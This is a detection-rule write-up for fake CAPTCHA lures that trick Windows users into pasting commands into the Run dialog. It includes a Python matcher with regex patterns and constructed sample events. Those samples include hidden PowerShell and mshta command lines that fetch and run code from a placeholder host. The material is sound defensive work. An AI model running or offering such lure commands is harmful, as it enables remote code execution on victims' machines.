
Summary
This detection rule identifies potential fake CAPTCHA phishing attacks based on the argument values passed to PowerShell or cmd.exe. Attackers typically deliver the lure through compromised websites that use browser injections masquerading either as a failed CAPTCHA verification or as a legitimate error notice that requires user action before the page will display. The victim is tricked into pasting a malicious command into the Windows Run dialog box and executing it, which can compromise the system. The rule monitors process creation events on Windows hosts for command lines that match patterns indicating the execution of potentially malicious scripts or commands tied to such CAPTCHA lures.
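The command-line matching the summary describes, shown as an added example rather than the rule's own logic: a Python scan over constructed Sysmon-style process-creation events. The interpreter list, the keyword and download-and-execute patterns, and the parent-process check (explorer.exe, which is what launches commands typed into the Run dialog) are assumptions made for this example; the sample events and URLs are made up.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields).
# These are invented samples for the example, not real telemetry.
SAMPLE_EVENTS = [
    {  # lure-style command pasted into Win+R: hidden PowerShell, remote script, "verification" text as comment
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/x)" '
                       '# "I am not a robot - reCAPTCHA Verification ID: 7811"',
    },
    {  # same lure pattern through mshta (T1218.005)
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta https://example.invalid/verify # Verify you are human - captcha",
    },
    {  # benign automation: no CAPTCHA wording, not launched from the Run dialog
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Build\agent.exe",
        "CommandLine": r"powershell -NoProfile -File C:\build\deploy.ps1",
    },
    {  # benign Run-dialog use: interpreter from explorer.exe but nothing suspicious
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "cmd /c dir",
    },
]

# Interpreters the rule cares about (assumption: the page names PowerShell and cmd; mshta
# is included because T1218.005 is mapped).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Social-engineering text the lure appends so the Run box looks like a verification step
# (assumed wording for the example).
CAPTCHA_TERMS = re.compile(
    r"captcha|i am not a robot|verify you are human|verification id", re.I
)

# Download-and-execute primitives usually paired with the lure (assumed list for the example).
EXEC_TERMS = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|mshta)\b"
    r"|-e(nc|ncodedcommand)?\b\s+\S+|-w(indowstyle)?\s+hidden|https?://",
    re.I,
)


def match_reasons(event: dict) -> list[str]:
    """Return the reasons an event matches the fake-CAPTCHA pattern (empty list = no match).

    A match requires an interpreter of interest, CAPTCHA-style wording in the command line,
    and a download/execute primitive. The explorer.exe parent (Run dialog) is reported as an
    extra signal but is not required, so the rule still fires when the lure is launched elsewhere.
    """
    image = ntpath.basename(event["Image"]).lower()
    if image not in INTERPRETERS:
        return []
    cmd = event["CommandLine"]
    captcha_hit = CAPTCHA_TERMS.search(cmd)
    exec_hit = EXEC_TERMS.search(cmd)
    if not (captcha_hit and exec_hit):
        return []
    reasons = [
        f"interpreter={image}",
        f"captcha_term={captcha_hit.group(0)!r}",
        f"exec_primitive={exec_hit.group(0)!r}",
    ]
    if ntpath.basename(event["ParentImage"]).lower() == "explorer.exe":
        reasons.append("parent=explorer.exe (consistent with Run dialog)")
    return reasons


def detect(events: list[dict]) -> list[tuple[dict, list[str]]]:
    """Run the matcher over a batch of events and return (event, reasons) for each hit."""
    hits = []
    for event in events:
        reasons = match_reasons(event)
        if reasons:
            hits.append((event, reasons))
    return hits


if __name__ == "__main__":
    for event, reasons in detect(SAMPLE_EVENTS):
        print(ntpath.basename(event["Image"]), "->", "; ".join(reasons))
```

Requiring both the lure wording and an execution primitive keeps ordinary Run-dialog use of cmd.exe or PowerShell out of the results; in a production rule the keyword list should be tuned against the tenant's baseline, and the explorer.exe parent can be promoted to a required condition where Run-dialog abuse is the only scenario of interest.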
Categories
- Endpoint
- Windows
Data Sources
- Process
- Windows Registry
- Logon Session
- Application Log
- Network Traffic
ATT&CK Techniques
- T1059
- T1059.001
- T1059.003
- T1218
- T1218.005
- T1566
- T1566.001
Created: 2025-08-19